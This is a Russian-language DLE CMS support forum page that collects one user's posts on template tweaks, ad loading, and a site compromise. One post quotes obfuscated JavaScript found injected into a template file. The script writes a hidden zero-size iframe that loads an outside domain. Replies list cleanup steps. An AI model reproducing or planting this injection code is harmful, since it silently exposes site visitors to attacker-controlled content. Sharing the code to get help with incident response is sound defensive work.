Перейти к публикации

Vitaliy12J

Клиенты
  • Публикации

    17
  • Зарегистрирован

  • Посещение

Сообщения, опубликованные пользователем Vitaliy12J

  1. 23 часа назад, germanydletest сказал:

    на дату изменения файлов /templates/Default/js/libs.js на обоих сайтах, потом попросить тп хостинга, что бы они смотрели в логах сервера, из-под какого пользователя были внесены изменения в данные файлы (возможно это был root) и тогда уже либо сис-админы хостинга закроют дыры в ПО на сервере, либо же это где-то ваш прокол

    В том то и дело что дата на файле не изменилась.

     

    21 час назад, celsoft сказал:

    Для удаления шеллов на сервере, со стороны DLE Вам необходимо проделать следующее:

    1. Полностью перезалить все файлы скрипта на сервере на оригинальные из архива дистрибутива.
    2. Проверить наличие постороннего или подозрительного кода в файлах в папке /engine/data/
    3. После этого необходимо запустить антивирус в админпанели скрипта и удалить все на что он укажет без исключения.
    4. Если на вашем аккаунте на сервере несколько сайтов, то проделать вышеуказанные действия для всех сайтов без исключения.
    5. Изменить все пароли, как к хостингу, так и к DLE.
    6. Удалить в админпанели всех администраторов кроме себя.
    7. Никакие сторонние модули и модификации не ставить. Если использовались сторонние модули, то удалить их все без исключения.

    8. После обязательного выполнения пункта 1, если стоят старые версии скрипта, обязательно установить повторно все патчи безопасности http://dle-news.ru/bags/

    Со стороны сервера: 

    Обновить полностью все серверное ПО и сменить все пароли.

    Интересно вот что, на Демо сайте где тоже есть посторонний код, там на самом сайте всего две новости и все кроме регистрации и комментариев отключено. Еще пару лет назад на этом же хостинге постоянно отключался вывод похожих новостей, кто то в настройках PHP файла отключал, я думаю что сами работники хостинга таким способом боролись с нагрузкой. Хотя я у них по этому поводу спрашивал, они отнекивались. После того случая, что то пропало доверие к ним. Сайты там уже очень давно, это был мой первый хостинг (Jino), сейчас переношу потихоньку от туда сайты.

  2. 4 часа назад, webair сказал:

    http://dle-news.ru/bags/v10/

    http://dle-news.ru/bags/v96/

    и выставление правильных прав CHMOD на папки и файлы согласно документации

    Патчи все стояли кроме 10, права на файлы выставлены согласно документации.

  3. Здравствуйте, заметил посторонний код в скриптах на сайтах. На одном аккаунте хостинга стоит два сайта, один лицензия, второй демо. Код посторонний на обоих, доступ по FTP отключен уже давно, в логах хостинга никаких посторонних действий не зарегистрировано, все входы на хостинг зафиксированы только мои.

     

    Код в стандартном шаблоне:
     

    <script type="text/javascript" src="/templates/Default/js/libs.js"></script>

    Ну и добавлен собственно сам код:

    eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<2 5="9://b.e/d/" h=1 4=1 8="c" g=0 6=0 a=0 f=i></2>\');',19,19,'||iframe|document|height|src|marginheight|write|style|http|marginwidth|liventernet|hidden||ml|scrolling|frameborder|width|no'.split('|'),0,{}))

    Версия DLE 9.4

    В общем на что следует обратить внимание или лучше хостинг поменять?

  4. Проверил на чистом дистрибутиве, проблема не подтверждается. Видимо вами допущены какие либо ошибки в шаблоне. Либо некорректные правки в файлах скрипта производились.

    Дистрибутив чистый 9.4 без внесения каких либо изменений, шаблон Default

    Страница топ: /statistics.html

    Нажать на имя в топе.

    Подскажите в каком файле можно посмотреть в чем проблема.

  5. Здравствуйте, если зайти в статистику сайта и в топ пользователей нажать на имя любого пользователя открывается окошечко и в нем всегда отображается кнопка Админцентр, независимо кто нажал, любая группа. Я так понял эта кнопка обрабатывается скриптом jqueryui.js

    Хоть от нее толку обычным пользователям и гостям нету, но хотелось бы убрать. DLE 9.4

    Скриншот:

    3c949c249c89.png

  6. И чe это за бред? Мне просто интересно что он делает? О_о

    Ну там же и так видно, например рекламный скрипт размещается внизу страницы и загружается в самом конце когда страница сайта уже загрузилась, когда скрипт рекламы загрузился, отображает его в нужном месте. Полезно когда например партнерка лежит и скрипт тупо не грузится, представьте если код стоит в верху страницы, верхний баннер, страница в такой ситуации загрузится до того места где рекламный код и повиснет.

    Вы сами то свой скрипт пробовали в действие? :)

  7. Могу сделать на JavaScript с DIV
    Можно узнать как?

    В место, где баннер должен показываться

    <div id="banner"></div>
    В место, когда можно начинать подгрузку баннера (в самый низ страницы)
    										
    
    <div id="banner_code">Код баннера</div>						
    
    
    <script type="text/javascript">document.getElementById('banner').appendChild(document.getElementById('banner_code'));</script>
    
    [/code]

    Вот что то подобное бы сделать (вывод рекламных блоков) средствами самого движка.

  8. Здравствуйте, подскажите как сделать показ рекламных блоков после загрузки страницы, а то бывают ситуации когда загрузка баннеров и рекламных блоков притормаживает сайт. Нужно что бы сначала загрузилась страница и только после этого рекламные блоки. В движке ведь есть код который отвечает за вывод рекламы, вот в нем бы сделать проверку на загрузку страницы или хотя бы выставить временную задержку.

    Могу сделать на JavaScript с DIV, но хотелось бы сделать средствами самого движка в коде PHP.

  9. Для админки. В engine\inc\addnews.php ищем строку:

    if ($user_group[$member_db[1]]['allow_main'])  $main_input = "<input type=\"checkbox\" name=\"allow_main\" value=\"1\" checked> {$lang['addnews_main']}<br />";
    и в ней убираем checked вот так:
    if ($user_group[$member_db[1]]['allow_main'])  $main_input = "<input type=\"checkbox\" name=\"allow_main\" value=\"1\"> {$lang['addnews_main']}<br />";
    Теперь во вкладке "Дополнительно" не будет стоять галочка в "Публиковать на главной". Для добавления через сайт. В engine\modules\addnews.php ищем строку:
    if ($user_group[$member_id['user_group']]['allow_main']) $admintag .="&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"checkbox\" name=\"allow_main\" value=\"1\" checked>". $lang['add_al_m'];
    и в ней убираем checked вот так:
    if ($user_group[$member_id['user_group']]['allow_main']) $admintag .="&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"checkbox\" name=\"allow_main\" value=\"1\">". $lang['add_al_m'];

    Теперь не будет стоять галочка в "Публиковать на главной". Удачи!

  10. Здравствуйте. Сайт стоит на денвере(пред покупкой решил потестить), версия 6.5. Недавно заметил что в админке в разделе категории пропал список категорий. Написано: Категорий нет. Хотя категории создаются и работают, но список пропал. До этого все работало, просто решил подредактировать категории зашел а списка нет. Подскажите что может быть и как это можно исправить. Спасибо. С наступившим вас Новым Годом!

    Только что испробовал такую штуку:

    Заменил в папке файлы \inc\categories.php и functions.inc.php от версии 6.3 и категории в списке появились. Почему не работают от 6.5?

×
×
  • Создать...